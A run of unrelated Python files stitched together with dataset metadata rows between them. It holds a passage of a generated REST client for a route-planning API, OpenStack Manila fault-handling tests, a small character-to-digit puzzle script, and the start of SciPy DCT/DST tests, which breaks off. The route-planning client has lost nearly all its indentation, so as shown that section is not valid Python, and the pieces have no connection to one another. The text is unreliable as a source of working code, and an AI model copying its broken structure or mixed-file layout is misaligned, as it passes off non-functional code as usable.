path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
header_params = {}
form_params = {}
files = {}
if 'name' in params:
form_params['name'] = params['name']
if 'ref' in params:
form_params['ref'] = params['ref']
if 'date' in params:
form_params['date'] = params['date']
if 'zoning_id' in params:
form_params['zoning_id'] = params['zoning_id']
if 'out_of_date' in params:
form_params['out_of_date'] = params['out_of_date']
if 'route_ids' in params:
form_params['route_ids'] = params['route_ids']
if 'tag_ids' in params:
form_params['tag_ids'] = params['tag_ids']
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type(['application/x-www-form-urlencoded'])
# Authentication setting
auth_settings = ['api_key']
response = self.api_client.call_api(resource_path, method, path_params, query_params, header_params,
body=body_params, post_params=form_params, files=files,
response='V01Planning', auth_settings=auth_settings)
return response
def delete_planning(self, id, **kwargs):
"""
Delete planning.
:param str id: Id or the ref field value, then use \"ref:[value]\". (required)
:return: str
"""
# verify the required parameter 'id' is set
if id is None:
raise ValueError("Missing the required parameter `id` when calling `delete_planning`")
all_params = ['id']
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError("Got an unexpected keyword argument '%s' to method delete_planning" % key)
params[key] = val
del params['kwargs']
resource_path = '/0.1/plannings/{id}.{format}'.replace('{format}', 'json')
method = 'DELETE'
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
header_params = {}
form_params = {}
files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type([])
# Authentication setting
auth_settings = ['api_key']
response = self.api_client.call_api(resource_path, method, path_params, query_params, header_params,
body=body_params, post_params=form_params, files=files,
response='str', auth_settings=auth_settings)
return response
def automatic_insert_stop(self, id, **kwargs):
"""
Suggest a place for an unaffected stop.
:param str id: Id or the ref field value, then use \"ref:[value]\". (required)
:return: str
"""
# verify the required parameter 'id' is set
if id is None:
raise ValueError("Missing the required parameter `id` when calling `automatic_insert_stop`")
all_params = ['id']
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError("Got an unexpected keyword argument '%s' to method automatic_insert_stop" % key)
params[key] = val
del params['kwargs']
resource_path = '/0.1/plannings/{id}/automatic_insert.{format}'.replace('{format}', 'json')
method = 'PATCH'
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
header_params = {}
form_params = {}
files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type([])
# Authentication setting
auth_settings = ['api_key']
response = self.api_client.call_api(resource_path, method, path_params, query_params, header_params,
body=body_params, post_params=form_params, files=files,
response='str', auth_settings=auth_settings)
return response
def clone_planning(self, id, **kwargs):
"""
Clone the planning.
:param str id: Id or the ref field value, then use \"ref:[value]\". (required)
:return: V01Planning
"""
# verify the required parameter 'id' is set
if id is None:
raise ValueError("Missing the required parameter `id` when calling `clone_planning`")
all_params = ['id']
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError("Got an unexpected keyword argument '%s' to method clone_planning" % key)
params[key] = val
del params['kwargs']
resource_path = '/0.1/plannings/{id}/duplicate.{format}'.replace('{format}', 'json')
method = 'PATCH'
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
header_params = {}
form_params = {}
files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type([])
# Authentication setting
auth_settings = ['api_key']
response = self.api_client.call_api(resource_path, method, path_params, query_params, header_params,
body=body_params, post_params=form_params, files=files,
response='V01Planning', auth_settings=auth_settings)
return response
def optimize_routes(self, id, **kwargs):
"""
Starts asynchronous routes optimization.
:param str id: Id or the ref field value, then use \"ref:[value]\". (required)
:return: str
"""
# verify the required parameter 'id' is set
if id is None:
raise ValueError("Missing the required parameter `id` when calling `optimize_routes`")
all_params = ['id']
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError("Got an unexpected keyword argument '%s' to method optimize_routes" % key)
params[key] = val
del params['kwargs']
resource_path = '/0.1/plannings/{id}/optimize_each_routes.{format}'.replace('{format}', 'json')
method = 'GET'
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
header_params = {}
form_params = {}
files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type([])
# Authentication setting
auth_settings = ['api_key']
response = self.api_client.call_api(resource_path, method, path_params, query_params, header_params,
body=body_params, post_params=form_params, files=files,
response='str', auth_settings=auth_settings)
return response
def use_order_array(self, id, order_array_id, shift, **kwargs):
"""
Use order_array in the planning.
:param str id: Id or the ref field value, then use \"ref:[value]\". (required)
:param str order_array_id: (required)
:param int shift: (required)
:return: V01Planning
"""
# verify the required parameter 'id' is set
if id is None:
raise ValueError("Missing the required parameter `id` when calling `use_order_array`")
# verify the required parameter 'order_array_id' is set
if order_array_id is None:
raise ValueError("Missing the required parameter `order_array_id` when calling `use_order_array`")
# verify the required parameter 'shift' is set
if shift is None:
raise ValueError("Missing the required parameter `shift` when calling `use_order_array`")
all_params = ['id', 'order_array_id', 'shift']
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError("Got an unexpected keyword argument '%s' to method use_order_array" % key)
params[key] = val
del params['kwargs']
resource_path = '/0.1/plannings/{id}/orders/{order_array_id}/{shift}.{format}'.replace('{format}', 'json')
method = 'PATCH'
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
if 'order_array_id' in params:
path_params['order_array_id'] = params['order_array_id']
if 'shift' in params:
path_params['shift'] = params['shift']
query_params = {}
header_params = {}
form_params = {}
files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type([])
# Authentication setting
auth_settings = ['api_key']
response = self.api_client.call_api(resource_path, method, path_params, query_params, header_params,
body=body_params, post_params=form_params, files=files,
response='V01Planning', auth_settings=auth_settings)
return response
def refresh_planning(self, id, **kwargs):
"""
Force recompute the planning after parameter update.
:param str id: Id or the ref field value, then use \"ref:[value]\". (required)
:return: V01Planning
"""
# verify the required parameter 'id' is set
if id is None:
raise ValueError("Missing the required parameter `id` when calling `refresh_planning`")
all_params = ['id']
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError("Got an unexpected keyword argument '%s' to method refresh_planning" % key)
params[key] = val
del params['kwargs']
resource_path = '/0.1/plannings/{id}/refresh.{format}'.replace('{format}', 'json')
method = 'GET'
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
header_params = {}
form_params = {}
files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type([])
# Authentication setting
auth_settings = ['api_key']
response = self.api_client.call_api(resource_path, method, path_params, query_params, header_params,
body=body_params, post_params=form_params, files=files,
response='V01Planning', auth_settings=auth_settings)
return response
def switch_vehicles(self, id, **kwargs):
"""
Switch two vehicles.
:param str id: Id or the ref field value, then use \"ref:[value]\". (required)
:return: str
"""
# verify the required parameter 'id' is set
if id is None:
raise ValueError("Missing the required parameter `id` when calling `switch_vehicles`")
all_params = ['id']
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError("Got an unexpected keyword argument '%s' to method switch_vehicles" % key)
params[key] = val
del params['kwargs']
resource_path = '/0.1/plannings/{id}/switch.{format}'.replace('{format}', 'json')
method = 'PATCH'
path_params = {}
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
header_params = {}
form_params = {}
files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type([])
# Authentication setting
auth_settings = ['api_key']
response = self.api_client.call_api(resource_path, method, path_params, query_params, header_params,
body=body_params, post_params=form_params, files=files,
response='str', auth_settings=auth_settings)
return response
def update_stop(self, planning_id, route_id, id, **kwargs):
"""
Update stop.
:param int planning_id: (required)
:param int route_id: (required)
:param int id: (required)
:param bool active:
:return: str
"""
# verify the required parameter 'planning_id' is set
if planning_id is None:
raise ValueError("Missing the required parameter `planning_id` when calling `update_stop`")
# verify the required parameter 'route_id' is set
if route_id is None:
raise ValueError("Missing the required parameter `route_id` when calling `update_stop`")
# verify the required parameter 'id' is set
if id is None:
raise ValueError("Missing the required parameter `id` when calling `update_stop`")
all_params = ['planning_id', 'route_id', 'id', 'active']
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError("Got an unexpected keyword argument '%s' to method update_stop" % key)
params[key] = val
del params['kwargs']
resource_path = '/0.1/plannings/{planning_id}/routes/{route_id}/stops/{id}.{format}'.replace('{format}', 'json')
method = 'PUT'
path_params = {}
if 'planning_id' in params:
path_params['planning_id'] = params['planning_id']
if 'route_id' in params:
path_params['route_id'] = params['route_id']
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
header_params = {}
form_params = {}
files = {}
if 'active' in params:
            # pass the boolean through unchanged (bytes() here is a Python 2 leftover
            # that mangles the value under Python 3), matching the other boolean form params
            form_params['active'] = params['active']
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type(['application/x-www-form-urlencoded'])
# Authentication setting
auth_settings = ['api_key']
response = self.api_client.call_api(resource_path, method, path_params, query_params, header_params,
body=body_params, post_params=form_params, files=files,
response='str', auth_settings=auth_settings)
return response
def get_routes(self, planning_id, **kwargs):
"""
Fetch planning's routes.
:param str planning_id: Id or the ref field value, then use \"ref:[value]\". (required)
:return: list[V01Route]
"""
# verify the required parameter 'planning_id' is set
if planning_id is None:
raise ValueError("Missing the required parameter `planning_id` when calling `get_routes`")
all_params = ['planning_id']
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError("Got an unexpected keyword argument '%s' to method get_routes" % key)
params[key] = val
del params['kwargs']
resource_path = '/0.1/plannings/{planning_id}/routes.{format}'.replace('{format}', 'json')
method = 'GET'
path_params = {}
if 'planning_id' in params:
path_params['planning_id'] = params['planning_id']
query_params = {}
header_params = {}
form_params = {}
files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type([])
# Authentication setting
auth_settings = ['api_key']
response = self.api_client.call_api(resource_path, method, path_params, query_params, header_params,
body=body_params, post_params=form_params, files=files,
response='list[V01Route]', auth_settings=auth_settings)
return response
def get_route(self, planning_id, id, **kwargs):
"""
Fetch route.
:param str planning_id: Id or the ref field value, then use \"ref:[value]\". (required)
:param int id: (required)
:return: V01Route
"""
# verify the required parameter 'planning_id' is set
if planning_id is None:
raise ValueError("Missing the required parameter `planning_id` when calling `get_route`")
# verify the required parameter 'id' is set
if id is None:
raise ValueError("Missing the required parameter `id` when calling `get_route`")
all_params = ['planning_id', 'id']
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError("Got an unexpected keyword argument '%s' to method get_route" % key)
params[key] = val
del params['kwargs']
resource_path = '/0.1/plannings/{planning_id}/routes/{id}.{format}'.replace('{format}', 'json')
method = 'GET'
path_params = {}
if 'planning_id' in params:
path_params['planning_id'] = params['planning_id']
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
header_params = {}
form_params = {}
files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type([])
# Authentication setting
auth_settings = ['api_key']
response = self.api_client.call_api(resource_path, method, path_params, query_params, header_params,
body=body_params, post_params=form_params, files=files,
response='V01Route', auth_settings=auth_settings)
return response
def update_route(self, planning_id, id, **kwargs):
"""
Update route.
:param str planning_id: Id or the ref field value, then use \"ref:[value]\". (required)
:param int id: (required)
:param bool hidden:
:param bool locked:
:param str color:
:return: V01Route
"""
# verify the required parameter 'planning_id' is set
if planning_id is None:
raise ValueError("Missing the required parameter `planning_id` when calling `update_route`")
# verify the required parameter 'id' is set
if id is None:
raise ValueError("Missing the required parameter `id` when calling `update_route`")
all_params = ['planning_id', 'id', 'hidden', 'locked', 'color']
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError("Got an unexpected keyword argument '%s' to method update_route" % key)
params[key] = val
del params['kwargs']
resource_path = '/0.1/plannings/{planning_id}/routes/{id}.{format}'.replace('{format}', 'json')
method = 'PUT'
path_params = {}
if 'planning_id' in params:
path_params['planning_id'] = params['planning_id']
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
header_params = {}
form_params = {}
files = {}
if 'hidden' in params:
form_params['hidden'] = params['hidden']
if 'locked' in params:
form_params['locked'] = params['locked']
if 'color' in params:
form_params['color'] = params['color']
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type(['application/x-www-form-urlencoded'])
# Authentication setting
auth_settings = ['api_key']
response = self.api_client.call_api(resource_path, method, path_params, query_params, header_params,
body=body_params, post_params=form_params, files=files,
response='V01Route', auth_settings=auth_settings)
return response
def activation_stops(self, planning_id, id, active, **kwargs):
"""
Change stops activation.
:param str planning_id: Id or the ref field value, then use \"ref:[value]\". (required)
:param int id: (required)
:param str active: (required)
:return: V01Route
"""
# verify the required parameter 'planning_id' is set
if planning_id is None:
raise ValueError("Missing the required parameter `planning_id` when calling `activation_stops`")
# verify the required parameter 'id' is set
if id is None:
raise ValueError("Missing the required parameter `id` when calling `activation_stops`")
# verify the required parameter 'active' is set
if active is None:
raise ValueError("Missing the required parameter `active` when calling `activation_stops`")
all_params = ['planning_id', 'id', 'active']
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError("Got an unexpected keyword argument '%s' to method activation_stops" % key)
params[key] = val
del params['kwargs']
resource_path = '/0.1/plannings/{planning_id}/routes/{id}/active/{active}.{format}'.replace('{format}', 'json')
method = 'PATCH'
path_params = {}
if 'planning_id' in params:
path_params['planning_id'] = params['planning_id']
if 'id' in params:
path_params['id'] = params['id']
if 'active' in params:
path_params['active'] = params['active']
query_params = {}
header_params = {}
form_params = {}
files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type([])
# Authentication setting
auth_settings = ['api_key']
response = self.api_client.call_api(resource_path, method, path_params, query_params, header_params,
body=body_params, post_params=form_params, files=files,
response='V01Route', auth_settings=auth_settings)
return response
def move_destinations(self, planning_id, id, destination_ids, **kwargs):
"""
Move destination to routes. Append in order at end.
:param str planning_id: Id or the ref field value, then use \"ref:[value]\". (required)
:param str id: (required)
:param list[Integer] destination_ids: (required)
:return: str
"""
# verify the required parameter 'planning_id' is set
if planning_id is None:
raise ValueError("Missing the required parameter `planning_id` when calling `move_destinations`")
# verify the required parameter 'id' is set
if id is None:
raise ValueError("Missing the required parameter `id` when calling `move_destinations`")
# verify the required parameter 'destination_ids' is set
if destination_ids is None:
raise ValueError("Missing the required parameter `destination_ids` when calling `move_destinations`")
all_params = ['planning_id', 'id', 'destination_ids']
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError("Got an unexpected keyword argument '%s' to method move_destinations" % key)
params[key] = val
del params['kwargs']
resource_path = '/0.1/plannings/{planning_id}/routes/{id}/destinations/moves.{format}'.replace('{format}', 'json')
method = 'PATCH'
path_params = {}
if 'planning_id' in params:
path_params['planning_id'] = params['planning_id']
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
header_params = {}
form_params = {}
files = {}
body_params = None
if 'destination_ids' in params:
            # pass the id list through unchanged (bytes() on a list is a Python 2
            # leftover that breaks under Python 3), matching e.g. route_ids above
            form_params['destination_ids'] = params['destination_ids']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type(['multipart/form-data'])
# Authentication setting
auth_settings = ['api_key']
response = self.api_client.call_api(resource_path, method, path_params, query_params, header_params,
body=body_params, post_params=form_params, files=files,
response='str', auth_settings=auth_settings)
return response
def optimize_route(self, planning_id, id, **kwargs):
"""
Starts asynchronous route optimization.
:param str planning_id: Id or the ref field value, then use \"ref:[value]\". (required)
:param int id: (required)
:return: str
"""
# verify the required parameter 'planning_id' is set
if planning_id is None:
raise ValueError("Missing the required parameter `planning_id` when calling `optimize_route`")
# verify the required parameter 'id' is set
if id is None:
raise ValueError("Missing the required parameter `id` when calling `optimize_route`")
all_params = ['planning_id', 'id']
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError("Got an unexpected keyword argument '%s' to method optimize_route" % key)
params[key] = val
del params['kwargs']
resource_path = '/0.1/plannings/{planning_id}/routes/{id}/optimize.{format}'.replace('{format}', 'json')
method = 'PATCH'
path_params = {}
if 'planning_id' in params:
path_params['planning_id'] = params['planning_id']
if 'id' in params:
path_params['id'] = params['id']
query_params = {}
header_params = {}
form_params = {}
if 'planning_id' in params:
form_params['planning_id'] = params['planning_id']
if 'id' in params:
form_params['id'] = params['id']
files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type(['application/x-www-form-urlencoded'])
# Authentication setting
auth_settings = ['api_key']
response = self.api_client.call_api(resource_path, method, path_params, query_params, header_params,
body=body_params, post_params=form_params, files=files,
response='str', auth_settings=auth_settings)
return response
def move_stop(self, planning_id, id, stop_id, index, **kwargs):
"""
Move stop position in routes.
:param str planning_id: Id or the ref field value, then use \"ref:[value]\". (required)
:param str id: (required)
:param int stop_id: Stop id to move (required)
:param int index: New position in the route (required)
:return: str
"""
# verify the required parameter 'planning_id' is set
if planning_id is None:
raise ValueError("Missing the required parameter `planning_id` when calling `move_stop`")
# verify the required parameter 'id' is set
if id is None:
raise ValueError("Missing the required parameter `id` when calling `move_stop`")
# verify the required parameter 'stop_id' is set
if stop_id is None:
raise ValueError("Missing the required parameter `stop_id` when calling `move_stop`")
# verify the required parameter 'index' is set
if index is None:
raise ValueError("Missing the required parameter `index` when calling `move_stop`")
all_params = ['planning_id', 'id', 'stop_id', 'index']
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError("Got an unexpected keyword argument '%s' to method move_stop" % key)
params[key] = val
del params['kwargs']
resource_path = '/0.1/plannings/{planning_id}/routes/{id}/stops/{stop_id}/move/{index}.{format}'.replace('{format}', 'json')
method = 'PATCH'
path_params = {}
if 'planning_id' in params:
path_params['planning_id'] = params['planning_id']
if 'id' in params:
path_params['id'] = params['id']
if 'stop_id' in params:
path_params['stop_id'] = params['stop_id']
if 'index' in params:
path_params['index'] = params['index']
query_params = {}
header_params = {}
form_params = {}
if 'planning_id' in params:
form_params['planning_id'] = params['planning_id']
if 'id' in params:
form_params['id'] = params['id']
if 'stop_id' in params:
form_params['stop_id'] = params['stop_id']
if 'index' in params:
form_params['index'] = params['index']
files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type(['application/x-www-form-urlencoded'])
# Authentication setting
auth_settings = ['api_key']
response = self.api_client.call_api(resource_path, method, path_params, query_params, header_params,
body=body_params, post_params=form_params, files=files,
response='str', auth_settings=auth_settings)
return response
| gpl-2.0 | -6,249,175,168,843,568,000 | 31.322182 | 132 | 0.558558 | false |
vponomaryov/manila | manila/tests/api/middleware/test_faults.py | 1 | 4107 | # Copyright 2010 OpenStack LLC.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_serialization import jsonutils
import six
import webob
import webob.dec
import webob.exc
from manila.api.openstack import wsgi
from manila import test
class TestFaults(test.TestCase):
"""Tests covering `manila.api.openstack.faults:Fault` class."""
def _prepare_xml(self, xml_string):
"""Remove characters from string which hinder XML equality testing."""
xml_string = xml_string.replace(" ", "")
xml_string = xml_string.replace("\n", "")
xml_string = xml_string.replace("\t", "")
return xml_string
def test_400_fault_json(self):
"""Test fault serialized to JSON via file-extension and/or header."""
requests = [
webob.Request.blank('/.json'),
webob.Request.blank('/', headers={"Accept": "application/json"}),
]
for request in requests:
fault = wsgi.Fault(webob.exc.HTTPBadRequest(explanation='scram'))
response = request.get_response(fault)
expected = {
"badRequest": {
"message": "scram",
"code": 400,
},
}
actual = jsonutils.loads(response.body)
self.assertEqual("application/json", response.content_type)
self.assertEqual(expected, actual)
def test_413_fault_json(self):
"""Test fault serialized to JSON via file-extension and/or header."""
requests = [
webob.Request.blank('/.json'),
webob.Request.blank('/', headers={"Accept": "application/json"}),
]
for request in requests:
exc = webob.exc.HTTPRequestEntityTooLarge
fault = wsgi.Fault(exc(explanation='sorry',
headers={'Retry-After': 4}))
response = request.get_response(fault)
expected = {
"overLimit": {
"message": "sorry",
"code": 413,
"retryAfter": 4,
},
}
actual = jsonutils.loads(response.body)
self.assertEqual("application/json", response.content_type)
self.assertEqual(expected, actual)
def test_raise(self):
"""Ensure the ability to raise :class:`Fault` in WSGI-ified methods."""
@webob.dec.wsgify
def raiser(req):
raise wsgi.Fault(webob.exc.HTTPNotFound(explanation='whut?'))
req = webob.Request.blank('/.json')
resp = req.get_response(raiser)
self.assertEqual("application/json", resp.content_type)
self.assertEqual(404, resp.status_int)
self.assertIn(six.b('whut?'), resp.body)
def test_raise_403(self):
"""Ensure the ability to raise :class:`Fault` in WSGI-ified methods."""
@webob.dec.wsgify
def raiser(req):
raise wsgi.Fault(webob.exc.HTTPForbidden(explanation='whut?'))
req = webob.Request.blank('/.json')
resp = req.get_response(raiser)
self.assertEqual("application/json", resp.content_type)
self.assertEqual(403, resp.status_int)
self.assertNotIn(six.b('resizeNotAllowed'), resp.body)
self.assertIn(six.b('forbidden'), resp.body)
def test_fault_has_status_int(self):
"""Ensure the status_int is set correctly on faults."""
fault = wsgi.Fault(webob.exc.HTTPBadRequest(explanation='what?'))
self.assertEqual(400, fault.status_int)
| apache-2.0 | -6,209,282,040,056,393,000 | 36 | 79 | 0.60263 | false |
ProgDan/maratona | URI/uri2690.py | 1 | 1630 | class Main:
def __init__(self):
self.n = int(input())
self.s = ""
def change(self):
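        # map each character of self.s to a digit via the fixed substitution groups
        # below, printing at most 12 digits per input line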
self.con = 0
for i in range(0, len(self.s)):
if self.con == 12:
break
elif self.s[i] in ['a', 'k', 'u', 'G', 'Q']:
print(0, end='')
self.con += 1
elif self.s[i] in ['b', 'l', 'v', 'I', 'S']:
print(1, end='')
self.con += 1
elif self.s[i] in ['c', 'm', 'w', 'E', 'O', 'Y']:
print(2, end='')
self.con += 1
elif self.s[i] in ['d', 'n', 'x', 'F', 'P', 'Z']:
print(3, end='')
self.con += 1
elif self.s[i] in ['e', 'o', 'y', 'J', 'T']:
print(4, end='')
self.con += 1
elif self.s[i] in ['f', 'p', 'z', 'D', 'N', 'X']:
print(5, end='')
self.con += 1
elif self.s[i] in ['g', 'q', 'A', 'K', 'U']:
print(6, end='')
self.con += 1
elif self.s[i] in ['h', 'r', 'C', 'M', 'W']:
print(7, end='')
self.con += 1
elif self.s[i] in ['i', 's', 'B', 'L', 'V']:
print(8, end='')
self.con += 1
elif self.s[i] in ['j', 't', 'H', 'R']:
print(9, end='')
self.con += 1
print()
def output(self):
for self.i in range(0, self.n):
self.s = input()
self.change()
if __name__ == '__main__':
obj = Main()
obj.output()
| gpl-3.0 | 6,681,451,894,900,894,000 | 30.960784 | 61 | 0.320245 | false |
DailyActie/Surrogate-Model | 01-codes/scipy-master/scipy/fftpack/tests/test_real_transforms.py | 1 | 14903 | #!/usr/bin/env python
from __future__ import division, print_function, absolute_import
from os.path import join, dirname
import numpy as np
from numpy.testing import assert_array_almost_equal, assert_equal, TestCase
from scipy.fftpack.realtransforms import dct, idct, dst, idst
# Matlab reference data
MDATA = np.load(join(dirname(__file__), 'test.npz'))
X = [MDATA['x%d' % i] for i in range(8)]
Y = [MDATA['y%d' % i] for i in range(8)]
# FFTW reference data: the data are organized as follows:
# * SIZES is an array containing all available sizes
# * for every type (1, 2, 3, 4) and every size, the array dct_type_size
# contains the output of the DCT applied to the input np.linspace(0, size-1,
# size)
FFTWDATA_DOUBLE = np.load(join(dirname(__file__), 'fftw_double_ref.npz'))
FFTWDATA_SINGLE = np.load(join(dirname(__file__), 'fftw_single_ref.npz'))
FFTWDATA_SIZES = FFTWDATA_DOUBLE['sizes']
def fftw_dct_ref(type, size, dt):
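    # return (input signal, FFTW reference output, working dtype) for a DCT of the
    # given type and size, selecting the single- or double-precision reference table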
x = np.linspace(0, size - 1, size).astype(dt)
dt = np.result_type(np.float32, dt)
if dt == np.double:
data = FFTWDATA_DOUBLE
elif dt == np.float32:
data = FFTWDATA_SINGLE
else:
raise ValueError()
y = (data['dct_%d_%d' % (type, size)]).astype(dt)
return x, y, dt
def fftw_dst_ref(type, size, dt):
x = np.linspace(0, size - 1, size).astype(dt)
dt = np.result_type(np.float32, dt)
if dt == np.double:
data = FFTWDATA_DOUBLE
elif dt == np.float32:
data = FFTWDATA_SINGLE
else:
raise ValueError()
y = (data['dst_%d_%d' % (type, size)]).astype(dt)
return x, y, dt
class TestComplex(TestCase):
def test_dct_complex64(self):
y = dct(1j * np.arange(5, dtype=np.complex64))
x = 1j * dct(np.arange(5))
assert_array_almost_equal(x, y)
def test_dct_complex(self):
y = dct(np.arange(5) * 1j)
x = 1j * dct(np.arange(5))
assert_array_almost_equal(x, y)
def test_idct_complex(self):
y = idct(np.arange(5) * 1j)
x = 1j * idct(np.arange(5))
assert_array_almost_equal(x, y)
def test_dst_complex64(self):
y = dst(np.arange(5, dtype=np.complex64) * 1j)
x = 1j * dst(np.arange(5))
assert_array_almost_equal(x, y)
def test_dst_complex(self):
y = dst(np.arange(5) * 1j)
x = 1j * dst(np.arange(5))
assert_array_almost_equal(x, y)
def test_idst_complex(self):
y = idst(np.arange(5) * 1j)
x = 1j * idst(np.arange(5))
assert_array_almost_equal(x, y)
class _TestDCTBase(TestCase):
def setUp(self):
self.rdt = None
self.dec = 14
self.type = None
def test_definition(self):
for i in FFTWDATA_SIZES:
x, yr, dt = fftw_dct_ref(self.type, i, self.rdt)
y = dct(x, type=self.type)
assert_equal(y.dtype, dt)
# XXX: we divide by np.max(y) because the tests fail otherwise. We
# should really use something like assert_array_approx_equal. The
# difference is due to fftw using a better algorithm w.r.t error
# propagation compared to the ones from fftpack.
assert_array_almost_equal(y / np.max(y), yr / np.max(y), decimal=self.dec,
err_msg="Size %d failed" % i)
def test_axis(self):
nt = 2
for i in [7, 8, 9, 16, 32, 64]:
x = np.random.randn(nt, i)
y = dct(x, type=self.type)
for j in range(nt):
assert_array_almost_equal(y[j], dct(x[j], type=self.type),
decimal=self.dec)
x = x.T
y = dct(x, axis=0, type=self.type)
for j in range(nt):
assert_array_almost_equal(y[:, j], dct(x[:, j], type=self.type),
decimal=self.dec)
class _TestDCTIIBase(_TestDCTBase):
def test_definition_matlab(self):
        # Test correspondence with matlab (orthonormal mode).
for i in range(len(X)):
dt = np.result_type(np.float32, self.rdt)
x = np.array(X[i], dtype=dt)
yr = Y[i]
y = dct(x, norm="ortho", type=2)
assert_equal(y.dtype, dt)
assert_array_almost_equal(y, yr, decimal=self.dec)
class _TestDCTIIIBase(_TestDCTBase):
def test_definition_ortho(self):
        # Test orthonormal mode.
for i in range(len(X)):
x = np.array(X[i], dtype=self.rdt)
dt = np.result_type(np.float32, self.rdt)
y = dct(x, norm='ortho', type=2)
xi = dct(y, norm="ortho", type=3)
assert_equal(xi.dtype, dt)
assert_array_almost_equal(xi, x, decimal=self.dec)
class TestDCTIDouble(_TestDCTBase):
def setUp(self):
self.rdt = np.double
self.dec = 10
self.type = 1
class TestDCTIFloat(_TestDCTBase):
def setUp(self):
self.rdt = np.float32
self.dec = 5
self.type = 1
class TestDCTIInt(_TestDCTBase):
def setUp(self):
self.rdt = int
self.dec = 5
self.type = 1
class TestDCTIIDouble(_TestDCTIIBase):
def setUp(self):
self.rdt = np.double
